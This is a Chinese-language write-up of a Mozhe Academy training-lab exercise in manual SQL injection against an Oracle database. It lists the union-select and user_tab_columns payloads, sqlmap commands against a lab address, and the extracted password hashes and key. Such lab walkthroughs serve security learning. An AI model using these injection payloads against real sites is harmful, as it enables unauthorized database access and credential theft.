当前位置: 首页 > news >正文

墨者学院 手工注入题解(oracle数据库)

news 2025/11/22 15:41:35

简介

       Oracle 数据库系统,是美国ORACLE公司(甲⻣⽂)提供的以分布式数据库为核⼼的⼀组软件 产品。是⽬前世界上使⽤最为⼴泛的,数据库管理系统。

以下是手工注入的流程:

1、判断注入点

使用  and 1=1  进行拼接

2、确定字段数

使用语句  order by

最终确定为只有两个字段

 

3、确定返回点

使用语句  ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句    sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db   查看当前数据库

5、确定数据库中的表名

使用语句   sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句     id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual     进行模糊搜索

确定第一列为  user_name  

使用语句   id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual  进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句   new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong  的密码为    1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定  hu  的密码为  1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为  48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定  mozhe  的密码为  267581

9、登录后台

10、提交KEY

KEY:mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民,网络安全为人民


http://www.mrgr.cn/news/9969.html

相关文章:

  • 前端常见问题
  • KEIL Stm32 bin文件生成的两种方法以及报错的处理
  • 我的香橙派闹钟-v0.1 mini
  • tomcat session共享
  • uniapp实现区域滚动、下拉刷新、上滑滚动加载更多
  • 打卡51天------图论(深搜/广搜应用题)
  • 十五张图带你快速入门 shardingsphere-proxy
  • 谷歌浏览器 Google Chrome 禁止扩展.crx更新
  • MinerU pdf文档解析markdown格式、内容提取
  • 力扣1590.使数组和能被P整除
  • c语言计算等比数列各项数值
  • Jenkins部署SpringBoot项目
  • CentOS7+Python+Flask+Https服务
  • 3. 如何选择合适的集合实现类(如ArrayList vs LinkedList,HashMap vs TreeMap)?PangHu大约 4 分钟
  • H7-TOOL脱机烧录的UID加密操作方法,支持一键生成目标板C代码,方便大家轻松操作(2024-08-20,已发布)
  • 【计算机网络】名词解释--网络专有名词详解
  • Baumer工业相机堡盟工业相机如何通过BGAPI SDK设置相机本身的数据保存(CustomData)功能(Python)
  • 保障数据传输的准确性:信号完整性技术要点速览
  • Win11搭建Angular开发环境
  • 数据结构-串-模式匹配算法(KMP算法)